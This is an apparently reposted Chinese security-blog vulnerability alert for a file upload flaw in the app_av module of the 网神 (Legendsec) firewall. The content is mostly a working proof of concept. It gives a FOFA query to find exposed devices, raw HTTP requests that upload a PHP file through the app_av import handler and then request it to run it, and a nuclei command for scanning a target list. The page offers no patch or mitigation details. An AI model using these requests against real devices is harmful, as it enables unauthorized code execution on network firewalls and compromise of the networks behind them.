网神 防火墙 app_av 文件上传漏洞 poc

admin 2024年10月21日19:22:27评论29 views字数 1239阅读4分7秒阅读模式

0x02 漏洞描述

网神 防火墙 app_av 存在文件上传漏洞。

网神 防火墙 app_av 文件上传漏洞 poc

0x03 漏洞复现

fofa:fid="1Lh1LHi6yfkhiO83I59AYg=="

1.执行poc进行获取cookie,文件上传无害文件得到结果

GET / HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15POST /?g=app_av HTTP/1.1Host: Accept: */*Accept-Encoding: gzip, deflateContent-Length: 440Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQcCookie: __s_sessionid__={{cookie}}User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="reqfile";filename="{{cookie}}.php"Content-Type: text/plain<?php echo(md5(233));unlink(__FILE__);?>------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="submit_post"app_av_import_save------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="certfile_r"file------WebKitFormBoundaryJpMyThWnAxbcBBQc--     GET /attachements/{{cookie}}.php HTTP/1.1Host: Cookie: __s_sessionid__={{cookie}};User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15   

网神 防火墙 app_av 文件上传漏洞 poc

2.nuclei验证脚本已发布于知识星球

nuclei.exe -t wangshen-secgate-app_av-fileupload.yaml -l subs.txt -stats

网神 防火墙 app_av 文件上传漏洞 poc

   

原文始发于微信公众号(融云攻防实验室):漏洞预警 网神 防火墙 app_av 文件上传漏洞

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月21日19:22:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   网神 防火墙 app_av 文件上传漏洞 pochttps://cn-sec.com/archives/3296844.html

发表评论

匿名网友 填写信息